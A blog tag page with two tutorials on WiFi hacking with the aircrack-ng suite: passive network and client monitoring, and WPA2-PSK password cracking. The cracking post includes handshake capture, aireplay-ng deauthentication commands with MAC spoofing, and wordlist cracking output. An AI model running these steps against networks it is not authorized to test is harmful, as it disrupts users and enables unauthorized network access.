Sam Hilliard

Tag: aircrack-ng

  • How to crack your WiFi network’s password with aircrack-ng

    How to crack your WiFi network’s password with aircrack-ng

    Hello again! If you read my last post on AP and Client discovery with Airodump-ng, then get ready to take the skills you learned to the next level! We’re not just going to be observers anymore. We’re going to hack wireless networks by cracking their passwords!

    This method involves using airodump-ng to capture the necessary traffic we need to use the infamous wireless cracking tool, aircrack-ng to crack passwords using a wordlist. And the best part is, this can be done completely offline!

    Let’s get started!

    Wireless Encryption

    Before we get started with hacking WiFi, there are a few things we have to understand first.

    Wireless Access Points (APs) support a variety of different encryption standards. Those in existence are WEP, WPA, WPA2, and WPA3.

    WEP is the weakest and can be cracked quickly without a wordlist. WPA, WPA2, and WPA3 are improvements of each other. We’re not going to go into the details but just know that each one that follows offers stronger encryption and other security improvements.

    The encryption standard we are going to be focusing on is WPA2. It has been around since 2004 and its successor has yet to make a full public appearance (at the time of this writing). If you did some snooping after reading my post about airodump-ng, you might have noticed that the most popular encryption type was WPA2. That’s because it’s the strongest encryption method that offers the most support for wireless devices. Your home network is probably encrypted with WPA2 and many businesses use WPA2 encryption.

    We’re also going to be focusing on WPA2/PSK, not the Enterprise variety. PSK stands for Pre-shared Key and if you’ve ever logged into a WiFi network with a plain-text password, you’ve used PSK encryption. Enterprise requires an additional server, called a RADIUS server, and users are authenticated with an account. For this reason, it is used for businesses because it offers centralized control.

    WPA2/PSK is the most common encryption method for a wireless network at the time of this writing. So, you’ll likely have plenty of options to experiment with.

    The 4-way Handshake

    The 4-way handshake occurs every time a client associates itself with a wireless access point (a user logs-in to the WiFi). Basically, the purpose of this 4-way handshake is to generate the encryption keys needed for an authorized client to communicate with the AP.

    We’re not going to go super in-depth on the protocol behind this but this diagram from a Medium article sums the process up nicely:

    I recommend checking that article out for a pretty decent explanation. This youtube video is also pretty good at explaining the 4-way handshake.

    All you need to know is that when we capture this 4-way handshake, aircrack-ng is going to use each guess and necessary parameters from the handshake to reconstruct the encryption keys (PTK and/or GTK). Then, it will hash the encryption keys to form the MICs (Message Integrity Check). If the MIC matches the original MIC from the captured handshake, the guess is correct.

    If you didn’t get all that don’t worry! Seeing this in action might help to clear things up. Even if it doesn’t, it took me a while to understand this process in-depth.

    Capturing the Handshake

    Ok! Onto the fun stuff! The first step in this process is to get that 4-way handshake. To do that we need a couple of things:

    1. a running instance of airodump-ng
    2. a client to associate with the network (a WiFi network you can log in to)

    First, let’s get our network card into monitor mode:

    $ sudo airmon-ng start wlx9cefd5fee020

    Now, our network card is ready to start capturing information. Fire up airodump-ng:

    $ sudo airodump-ng wlan0mon

D8:38:FC:FC:EB:A9  -41        2        0    0   1  130   WPA2 CCMP   PSK  Hack Me

    You can stop here and wait for airmon-ng to capture a handshake from any network within range or target a specific one. aircrack-ng can recognize multiple handshakes and you can choose from the list you gathered but I’m going to target a specific network I already have access to:

    $ sudo airodump-ng --bssid D8:38:FC:FC:EB:A9 -c 1 wlan0mon -w ~/Desktop/mywifi

 CH  1 ][ Elapsed: 12 s ][ 2023-06-27 16:09 ][ WPA handshake: D8:38:FC:FC:EB:A9 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 D8:38:FC:FC:EB:A9  -43   0      105       17    8   1  130   WPA2 CCMP   PSK  Hack Me                                                        

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 D8:38:FC:FC:EB:A9  18:26:49:74:0B:E4   -6   36e- 6e    21       62  EAPOL

    This process should be pretty familiar to you by now. One difference is that we captured a WPA handshake. airodump-ng handily tells us this in the top right.

    Remember to capture the handshake we need a client to associate with the AP. In my case, since I already knew the password, I just re-authenticated with my phone.

    If you don’t know the password, you have a couple of options:

    1. Wait until a client re-associates
    2. Force a client to re-associate

    The second option is illegal but I’ll show you how to do it for educational purposes only. Note: your traffic will be logged by the AP and there is a chance you could get caught for this, so do it at your own risk

    To force re-authentication on clients, we can kick them off the network with aireplay-ng:

    $ sudo aireplay-ng -0 100 -a D8:38:FC:FC:EB:A9 wlan0mon

    This command will 100 send deauthentication frames (-0 100) to everyone on my network (-a <BSSID>). In other words, I would be DOS-ign my network if I were to run this.

    To make this a little stealthier, we can target a single client with -c <client MAC> and spoof our MAC address with -h <spoofed MAC>:

    $ sudo aireplay-ng -0 3 -a D8:38:FC:FC:EB:A9 -c 27:18:C2:1B:0B:A4 -h 44:28:78:90:C1:68 wlan0mon

    Whichever route you go, you should now have captured a handshake and written the captured data to a file. I saved mine to ~/Desktop/mywifi. Let’s open Wireshark to see what the handshake looks like:

    The protocol used for the handshake is EAPOL, so I filtered my results to display only the handshake. As expected, there are four of them.

    Cracking the password

    The moment we’ve all been waiting for…Now we get to crack the password!

    At this point, we’ve gathered everything we need to start our attack. If you haven’t done so already, you can go ahead and take your network card out of monitor mode and shutdown airodump-ng:

    $ sudo airmon-ng stop wlan0mon

    To crack my network’s password, I’m going to use the infamous rockyou.txt wordlist. This wordlist is commonly used in CTFs and other hacking challenges involving password cracking because of its popularity. It even comes preinstalled in some hacking Linux distributions like Kali Linux. So, if your password shows up in rockyou, I suggest you change it…

    To crack the password, all you need to give aircrack-ng is the wordlist and the capture file like so:

    $ aircrack-ng -w /opt/rockyou.txt mywifi-01.cap

Reading packets, please wait...
Opening mywifi-01.cap
Read 10891 packets.

   #  BSSID              ESSID                     Encryption

   1  D8:38:FC:FC:EB:A9  Hack Me             WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening mywifi-01.cap
Read 10891 packets.

1 potential targets



                               Aircrack-ng 1.6 

      [00:00:02] 18440/10303727 keys tested (10231.10 k/s) 

      Time left: 16 minutes, 45 seconds                          0.18%

                           KEY FOUND! [ appletree ]


      Master Key     : 1F 9A CD 80 9E 4A 5D 41 F8 49 28 52 94 D9 5D 5A 
                       C7 6F 5A FC 41 98 74 51 91 F6 E5 E9 FC 22 CC E4 

      Transient Key  : 2B 3A 52 BC 76 6A 6A 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 24 41 72 F8 5E 04 E4 6F 37 72 24 CC 57 F9 0B E3

    As you can see, it automatically identified the handshake and since there was only one in the file, it got straight to cracking. In no time at all, it was able to find the password: appletree. For me, it took less than a few seconds. Embarrassing…

    We can also see that it was able to calculate the other parameters of the 4-way handshake including the PMK (Master Key), the PTK, and the MIC (EAPOL HMAC).

    And that’s it! Easy peezee-lemon-squeezy! Of course, your results will depend on the wordlist you use. If your password is not in the wordlist, you won’t be able to crack the password. For proof of concept, you might want to make a small test wordlist with your WiFi password included (assuming you’re attacking a network you have access to).

    Conclusion

    You now know how to crack WiFi passwords running WPA2/PSK encryption! Give yourself a pat on the back hacker!

    Of course, it goes without saying that if you crack the password of a network and then use that password to get unauthorized access to the network, that is where you cross the line into illegal territory. So please, don’t do that. 🙂

    By all means, try this out 100% passively. See what information you can gather with airodump-ng just by leaving it running in your home for an hour or so. You might be surprised at what you’ve gathered. Then try cracking passwords for fun!

    It’s surprising how many people will opt for insecure passwords. I mean, my own apartment complex’s network opted for one of the weakest passwords in the book… Come on! It’s 2023! No matter how secure a system is, people will always be the weakest link. I changed the BSSID and the ESSID of the network in the examples to avoid legal trouble but their WiFi might as well be public…

    Anyways…Hope you enjoyed this article. I certainly enjoyed writing it! Stay tuned for more and practice responsibly!

  • How to visualize the networks around you

    How to visualize the networks around you

    Hello! In this post we’re going to shift gear onto a new topic: Wireless Hacking! When I was younger, I loved learning about networks. I was fascinated by all of the wireless traffic floating around through the air. This lead me down the rabbit hole of wireless hacking and among the very first wireless testing tools I learned how to use was aircrack-ng.

    aircrack-ng is part of a suite of tools used for various WiFi hacking methods, ranging anywhere from cracking passwords from WiFi handshakes to creating fake wireless access points. They are relatively easy to use, yet require you to have a stronger understanding of Wireless Networks than many automated scripts do. The aircrack-ng line of tools were also developed in the classic UNIX style: each does one, simple thing really well, allowing for modular and flexible attacks.

    For this reason, learning how to use aircrack-ng‘s tools is a great place to start if you want to get into wireless attacks. So, without further-ado, let’s kick-off this journey by teaching you how to monitor the wireless devices in your area!

    Before getting started…

    I’m going to assume you have a few things you have before getting started:

    1. A machine running Linux (can be a VM).
    2. At least some experience on the command line.
    3. A wireless card supporting monitor mode.

    If you have all those things, great! If not, then no sweat. Follow along for an interesting read and maybe get yourself all setup in the future :).

    Your onboard network card may not support monitor mode (mine doesn’t) so check out this article from Null Byte on good recommendations. I have been using Panda Wireless’s PAU05 since I first started and I highly recommend getting one (or something similar) because it’s cheap and has a low profile.

    Everything I’m about to teach you in this article is 100% legal. We are simply acting as observers watching traffic fly by in the air, which is public space. So, I encourage you to follow along for the best learning!

    Monitor mode

    By default, most network cards operate in managed mode. This just means that they will associate themselves with a single wireless access point. Currently, my wireless adapter is running in managed mode:

    $ iwconfig

wlx9cefd5fee020  IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

    Monitor mode, on the other hand, allows the wireless network card to capture traffic from other wireless access points and clients connected to those access points (or clients attempting to connect).

    We can switch our wireless card into monitor mode with airmon-ng:

    $ sudo airmon-ng start wlx9cefd5fee020                               

Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    644 avahi-daemon
    650 NetworkManager
    688 wpa_supplicant
    702 avahi-daemon

PHY	Interface	Driver		Chipset

phy0	wlp0s20f3	iwlwifi		Intel Corporation Ice Lake-LP PCH CNVi WiFi (rev 30)
phy1	wlx9cefd5fee020	rt2800usb	Ralink Technology, Corp. RT5372
Interface wlx9cefd5fee020mon is too long for linux so it will be renamed to the old style (wlan#) name.

		(mac80211 monitor mode vif enabled on [phy1]wlan0mon
		(mac80211 station mode vif disabled for [phy1]wlx9cefd5fee020)

    You might’ve noticed that I supplied airmon-ng with the name of my wireless adapter, wlx9cefd5fee020, and it went ahead and renamed it to wlan0mon for our convenience.

    Also, it identified some processes that may force our wireless card back into managed mode. You can kill those processes by running sudo airmon-ng check kill. I usually don’t because I’ve never had any trouble with this. If you’re only using an onboard wireless card, then you may want to before continuing.

    Running iwconfig again, we can see that the switch was successful:

    $ iwconfig

wlan0mon  IEEE 802.11  Mode:Monitor  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

    Monitoring the air

    Now it’s time for the fun stuff: sniffing traffic with airodump-ng!

    To start it, all you have to do is give it your wireless card’s name:

    $ sudo airodump-ng -M -W wlan0mon

CH  8 ][ Elapsed: 12 s ][ 2023-06-19 12:08 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH WPS      ESSI                       MANUFACTURER

 1A:F8:00:30:03:04   -1        0        0    0   2   -1                    0.0      <length:  0>               Unknown                               
 D8:38:FF:2C:10:28  -35        7        0    0  11  130   WPA2 CCMP   PSK  0.0      Star Legacy                Ruckus Wireless                                            
 1C:9E:D0:DD:CA:B8  -52        7        0    0   6  130   WPA2 CCMP   PSK  2.0      Deli Customer              eero inc.                               
 1E:9D:F6:D7:CA:BE  -53        7        0    0   6  130   OPN              0.0      MyCoolWiFi                 TP-Link Corporation Limited

    All you need to start airodump-ng is to run airodump-ng <card name> but I like to add -M to display manufacturer info and -W to see what version of WPS the access point (AP) is running.

    airodump-ng neatly separates data into columns, including:

    • BSSID: The device’s MAC address
    • PWR: The wireless signal strength (the larger the number the closer the AP)
    • CH: The frequency channel the AP is operating on
    • ENC: The encryption method being used (if any)
    • and more!

    Additionally, airodump-ng lists clients associated with an AP. We can zero in on a single AP to view the devices connected to it:

    $ sudo airodump-ng --bssid 11:F5:20:FF:C4:83 -c 6 wlan0mon                                                                                  

 CH  6 ][ Elapsed: 6 s ][ 2023-06-19 13:01 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 11:F5:20:FF:C4:83   -1   0        0        0    0  -1   -1                    Batman                                                          

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 11:F5:20:FF:C4:83  EA:C8:FE:DC:63:46  -60    0 -12      0       83                                                                                   
 11:F5:20:FF:C4:83  CA:98:CB:4C:93:1A  -62    0 -12     15       54                                                                                   
 11:F5:20:FF:C4:83  92:D0:69:4F:F6:D3  -78    0 -12      0        1

    Now, we can see all of the client MAC addresses that are connected to the “Batman” under the STATION column.

    Monitoring a single network in this way can allow you to leverage a surprising amount of information. For example, you can see what devices are connected to a network, giving you a rough idea of its structure and purpose. You can even get an idea of how many people are in a building given the number of mobile devices connected.

    There are more ways we can filter down all of this information. I highly recommend checking out airodump-ng‘s manual page with man airodump-ng to see what else you can do.

    Visualizing Results

    If you are capturing a ton of traffic, it can be extremely helpful to save the output to a file for examining and processing later. For example, I collected information about the networks near me on all bands (both 2.4 and 5 GHz) and saved the output to a file with this command:

    $ sudo airodump-ng -b abg -w /tmp/capture/blog-test wlan0mon

    The -b argument tells airodump-ng what bands to hop across (in this case, all) and -w tells it the file name/location to write to.

    airodump-ng writes the data to a number of different file formats, including a csv (which can be useful for opening as a spreadsheet or using in a script), and files that can be passed to other tools (like kismet, wireshark, or aircrack-ng).

    It can also be helpful to make this large amount of information more visual. This can be easily done with airgraph-ng. Note, airgraph-ng didn’t come installed with the rest of the aircrack-ng tools when I installed it, so you might have to install it separately.

    To run airgraph-ng you feed it the csv file written by airodump-ng and specify a graph type:

    $ airgraph-ng -i blog-test-01.csv -g CAPR -o blog-test-capr.png

    We supply a graph-type of CAPR with -g. CAPR stands for Client to AP Relationship and is useful for quickly seeing what AP’s are nearby and what devices are connected to them. Here’s a snippet of the one I took of the networks in my area:

    This is much easier to wrap our head around (at least for me) than scanning rows in a spreadsheet. The colored ovals represent the security encryption of the AP.

    The other graph type, CPG, stands for common probe graph. It’s shows us the devices that are sending probe requests (trying to connect) to certain AP’s. To generate your own, change the -g option from the last command to CPG and you should get something like this:

    It’s a lot less colorful than the CAPR, but can be useful for nefarious acts, such as creating a fake AP for these clients to connect to.

    Exiting Monitor Mode

    After we’ve finished monitoring networks, it’s time to revert our network card to manged-mode so it can connect to WiFi again. airmon-ng makes this a snap:

    $ sudo airmon-ng stop wlan0mon

    If you had airmon-ng kill any services, you may want to restart them like so:

    $ sudo systemctl NetworkManager start

    In the case you didn’t remember which services you killed fret not! A simple reboot of your machine will get the services back up and running.

    Conclusion

    Now you know how to observe the access points around you! This is a powerful skill that can be used to develop attacks — knowledge is power!

    I encourage you to be curious and try this at your home or anywhere you might find yourself. It’s good practice to familiarize yourself with how different wireless networks behave. Just make sure you hide your screen in public. Don’t want to scare anyone with your flashy hacker terminal!

    In the coming future, we’ll go more in-depth into monitoring wireless networks so stay tuned! In the meantime…have fun!